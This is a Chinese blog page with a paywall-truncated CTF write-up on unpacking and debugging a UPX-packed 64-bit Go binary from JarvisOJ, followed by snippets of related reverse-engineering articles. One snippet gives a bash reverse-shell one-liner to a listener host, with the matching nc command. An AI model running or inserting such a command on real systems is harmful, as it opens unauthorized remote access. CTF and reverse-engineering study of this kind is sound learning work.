171227 逆向-JarvisOJ(Shell)

最新推荐文章于 2019-12-27 10:54:47 发布
最新推荐文章于 2019-12-27 10:54:47 发布
阅读量968 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/whklhhhh/article/details/78917878
版权
本文详细记录了一次逆向分析64位UPX壳保护的Golang程序过程,涉及ida、调试器的使用。在分析过程中,发现了程序对输入的长度校验、异或变换以及自校验机制。通过动态调试找出关键函数,成功解密得到了password。还探讨了Golang程序的特性,如函数间的0xCC填充导致IDA识别困难,并给出了如何帮助IDA识别函数的方法。
摘要由CSDN通过智能技术生成

1625-5 王子昂 总结《2017年12月27日》 【连续第453天总结】
A. JarvisOJ-Shell
B.
这个64位的upx+golang真是够折腾人的..

首先查壳,发现PEiD直接罢工了,我还纳闷儿,明明都能运行了咋还不是有效的PE文件捏
然后ExeInfoPE才告诉我这货是64位文件

拖入IDA发现什么都没识别出来
但是通过区段名能看出来是UPX壳

然而掏UPX程序出来却报checksum error
还好UPX手脱难度不大

按照ESP定律轻松找到OEP
接下来就只能一个函数一个函数日了
找到输入函数sub_4643F0,但是一次只能接受8个字符,好像还有一些缓冲区什么的
来回断点调试,发现封装函数sub_464D00,它出来以后内存中就有完整的输入字符串了
这里写图片描述

对首字符下内存断点,跑起来~

然后就结束了(:з」∠)

难道是之间听说过的Ring0级的内核调用API,所以Ring3的调试器断不到嘛?
不能这么轻易放弃,再思考一下

除了直接校验input内容以外,还有可能进行先行其他校验
比如首尾字符、哈希、长度校验等等

考虑到读取断点没有断到,猜测是长度校验
于是在函数外单步运行调试,观察寄存器中出现的跟测试字符串长度相等的值,注意它被保存到内存的哪里去了

反复改变长度调试以后,最终确定了这里
这里写图片描述
上面的CreateFileW、GetFileType和ReadFile有点让人在意呢~
WriteConsoleW很明显就是在向控制台输出内容的API了
所以说没事翻翻内存的上下文也挺有好处的233毕竟堆都在一起

言归正传,找到长度以后࿰

最低0.47元/天 解锁文章
奈沙夜影
关注
专栏目录
jarvis oj reverse 病毒数据分析 writeup
charlie_heng的专栏
02-19 430
这题之前做过,但是做到一半就放弃了,现在又回来做一下 首先这题其实还是有点难度的 我们先来分析下main函数部分,首先它做了反debug判断,获取父进程信息 其次它还判断了程序所在位置,过了这几个判断之后,获取当前时间作为seed给srand 然后在注册表里面拿到文档所在的目录 接着在目录里面搜索docx后缀的文件,将其加密之后发送出去 在加密那里,它做了几件事 1. 生成8字节随机...
180127 逆向-JarvisOJ(BrokenDriver)(静态分析解法)
whklhhhh的博客
01-30 1313
1625-5 王子昂 总结《2018年1月27日》 【连续第484天总结】 A. JarvisOJ-BrokenDriver B. 昨天是按部就班修复驱动、调试查看内存来的 除此以外还可以逆向程序流程,跟着复原一遍即可得到最终结果,并不像一般程序一样需要分析逻辑、逆向反推输入首先可以看出来Unload函数中执行了sub_11482函数来解密Src中的东西,结果放在offset_1400
JarvisOJ 逆向Writeup
weixin_34161064的博客
07-19 280
1. 爬楼梯 先运行apk,查看具体的功能 爬一层楼是可以点击的,爬到了,看FLAG是不可以点击的.我们可以大致的了解到到了具体的楼层才可以看到flag,多次打开软件,楼层数目是随机的. 用APKIDE反编译后,用jd-gui查看源码 package com.ctf.test.ctf_100; import android.os.Bundle; import android...
Jarvis OJ-Reverse题目Writeup
weixin_33881140的博客
01-31 278
做一道更一道吧233333 DD-Android Easy 下载apk,先安装一下试试吧…… 猜测是输入正确的内容后给flag吧 将后缀改成zip,解压,用dex2jar处理classes.dex,然后用jd-gui打开,可以看到,该apk中只有一个FlagActivity,一部分一部分来看 protected void onCreate(Bundle paramBundle) ...
反向shell
weixin_34162228的博客
06-12 525
为什么80%的码农都做不了架构师?>>> ...
171202 逆向-JarvisOJ(软件密码破解-3)(1)
whklhhhh的博客
12-02 696
1625-5 王子昂 总结《2017年12月2日》 【连续第428天总结】 A. JarvisOJ-Re-软件密码破解-3(1) B. 说2有点意思的报应来了……这又来个3,并且还挺坑的OTZ查壳发现没有,直接打开,发现“确定”按钮是不可用状态 以为跟上次的一题一样是故意改的,于是使用SpyLite将按钮改为可用,结果马上就又变回去了,说明有代码在操作那么就不是这种小花招了,去OD中断G
171130 逆向-JarvisOJ(Fibonacci)
whklhhhh的博客
11-30 1135
1625-5 王子昂 总结《2017年11月30日》 【连续第426天总结】 A. JarvisOJ-Re-Fibonacci B. 首先运行,提示 来让我们玩一个数列游戏: a[0]=0,a[1]=1 a[2]=1,a[3]=2 a[4]=3,a[5]=5 ………….. 请计算a[100000000000000]: 刚开始还以为是通过什么算法做出来,准备
171201 逆向-JarvisOJ(软件密码破解-2)
whklhhhh的博客
12-01 1389
1625-5 王子昂 总结《2017年11月30日》 【连续第426天总结】 A. JarvisOJ-Re-软件密码破解-2 B. 这题挺有意思的,确实从JarvisOJ上学到了不少啊运行发现是个CUI程序,随便输入会进入死循环拖入IDA反编译,主函数结构很简单: 很简单的接收,于是跟入查看关键函数check: 进行了一大堆进程操作,总结下来就是将输入的内容作为参数重新开启了一个子进程
jarvisoj刷题之旅】逆向题目DDCTF - Android Easy的writeup
iqiqiya的博客
09-09 930
下载附件之后   改后缀为.apk 本来是直接载入jd-gui的   结果不好看明白代码 那我们就先放到安卓模拟器运行一下看看    输入123456789 发现Wrong Key   载入Androidkiller 第一步:搜索Wrong 第二步:搜索flag_result_no 第三步:搜索0x7f060023     得到三个好玩的 发现0x7f06...
171206 逆向-JarvisOJ(病毒数据分析)(1)
whklhhhh的博客
12-08 407
1625-5 王子昂 总结《2017年12月6日》 【连续第432天总结】 A. JarvisOJ-Re-病毒数据分析 B. 公司员工的计算机中招了! 在他的计算机上发现了一个病毒样本,同时网关上抓包时发现这台计算机好像传了点加密的信息出来,但是抓到的包可能有点不全,开头的一个包可能漏掉了。 请分析压缩包中病毒样本及数据包信息,解密出这台中招的计算机往外发的信息中包含的
jarvis oj reverse Fibonacci writeup
charlie_heng的专栏
02-22 436
这题之前也做过,不过卡了一下,现在再做,发现又会做了 首先要先把加密的class从exe里面dump出来 这里有个教程 http://reverseengineeringtips.blogspot.co.uk/2014/12/unpacking-jar2exe-21-extracting-jar.html 因为这个版本是x64的,所以断点停的是dec r8d 停住之后,在内存那里查看...
Jarvis OJREVERSE】 Smali
qq_26779635的博客
12-01 1074
题目:都说学好Smali是学习Android逆向的基础,现在刚好有一个smali文件,大家一起分析一下吧~~ 链接:Crackme.smali.36e0f9d764bb17e86d3d0acd49786a18 之前接触过点smali,看下文件就是smali,本来想找smali转java工具,但看了下smali发现几个函数名能推出东西,如下 然后结合smali语法花点时间看了...
Jarvis OJReverse】FindKey
qq_26779635的博客
11-27 1121
题目:FLAG就是你输入的key 链接:findkey.31a509f4006ba41368dcf963762388bb 首先用file看下是python2.7的字节码,拖入kali用uncomply2反编译,找到核心代码: if len(flag) != 17: print 'Wrong Key!!' sys.exit(1) flag = flag[::-1] for i...
记录一次手动脱壳 Jarvisoj Reverse Evil.exe
还木人的博客
10-20 342
这个题目的分值是200,对我来说是个不小的挑战啊。 查了一下壳,没有发现什么 真的这么简单?拖入IDA观察: 呃呃呃,果然不简单;在IDA里面没有任何函数的痕迹。只有一个.text段。 猜测,应该是加了某种壳对源程序加密过。用OD载入。 看到OD的提示,再看到这里的循环pushad,看来应该是有壳,可是工具又查不出来,手动? 这时想到了ESP定律,记录个大佬的ESP定律讲解链...
JarvisOJ Web&Reverse&Pwn
热门推荐
4ct10n
11-16 5万+
Web 0x01 phpinfo 0x02 WEB 0x03 Easy Gallery 0x04 Login 0x05 PORT51 0x06 LOCALHOST 0x07 神盾局的秘密 0x08 IN A Mess 0x09 api调用 0x0a Simple Injection 0x0b 图片上传漏洞 0x0c chopper 0x0b flag在管理员手里 Reverse 0x01FindK
Jarvis OJ API调用
沐目的博客
10-15 616
XXE任意文件读取 一、知识点 1.XML(可扩展标记语言) XML叫可扩展标记语言,是一种很像HTML的标记语言。但XML 的设计宗旨是传输数据,而不是显示数据。我理解的是一直传输数据的格式,把要传输的数据放在一个个自己定义的标签里,至于为什么要用这种格式传输,我就不知道了。 也许这有点难以理解,但是 XML 不会做任何事情。XML 被设计用来结构化、存储以及传输信息。 下面实例是 Jani 写...
反向 shell
lyyslsw的专栏
12-27 668
nc -p 4444 -lvv 监听在4444端口, 监听模式, 显示命令执行过程, 假设本机IP地址10.100.125.15 bash -i >& /dev/tcp/10.100.125.15/44440>&1, 假设本机IP地址为10.100.125.14 bash -i : bash的交互模式 当>&后面接文件时,表示将标准输...
ctf study of jarvisoj reverse
weixin_30570101的博客
09-30 125
[61dctf] androideasy164求解器50相反脚本如下:s='' a=113, 123, 118, 112, 108, 94, 99, 72, 38, 68, 72, 87, 89, 72, 36, 118, 100, 78, 72, 87, 121, 83, 101, 39, 62, 94, 62, 38, 107, 115, 106 for i in range(len(a...
JarvisOJ——病毒数据分析
40KO的博客
03-07 471
0x00前言 这是一道恶意代码分析的题目,其实特征不太像病毒啦。。。整个流程分析下来,还是有不少收获,虽然最后卡在了某个点,但程序的所有功能和流程都分析完成了(因为不复杂,T__T)。在这里,我就把它当作真正的恶意程序来分析一番。 0x01信息收集 一开始我们没有必要直接去逆向这个程序,而是先收集相关信息,这样能够更轻松的完成逆向分析的步骤。 0.首先将它丢进沙箱 可以看到给出的评估...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值